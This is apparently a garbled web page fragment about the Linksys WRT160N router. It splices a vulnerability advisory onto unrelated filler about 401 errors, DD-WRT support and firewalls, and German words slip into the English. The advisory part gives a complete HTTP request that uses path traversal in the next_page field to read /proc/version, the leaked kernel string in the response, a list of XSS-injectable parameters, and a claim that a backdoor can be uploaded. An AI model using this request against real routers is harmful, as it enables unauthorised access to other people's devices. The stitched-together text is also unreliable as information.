Request: POST /HTTP/1.1 Host: 192.168.178.233 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: Basic XXXXX= Content-Type: application/x-www-form-urlencoded Content-Length: 77 submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version Response: HTTP/1.1 200 Ok Server: httpd Date: Thu, GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close Linux version 2.4.30 ([email protected]) (gcc version 3.3.6) #9 Fri Aug 21 CST 2009 Screenshot: XSS Injecting scripts into the parameter ddns_enable, need_reboot, ping_ip and ping_size reveals that these parameters are not properly validated for malicious input.
You need to be authenticated or you have to find other methods for inserting the malicious Java Script code.
It is possible to upload and execute a backdoor to compromise the device.The 401 Unauthorized error displays inside the Internet browser window, just as web pages do.The 401 Unauthorized error is an HTTP status code that means the page you were trying to access cannot be loaded until you first log in with a valid user ID and password. Now I read here, that the WRT160N v2 is nocht supported by DD-WRT. I think it is not to expensive und it seems to be a good working item.Linksys WRT160N routers include a very basic firewall that helps protect your home network form unwanted access from the internet.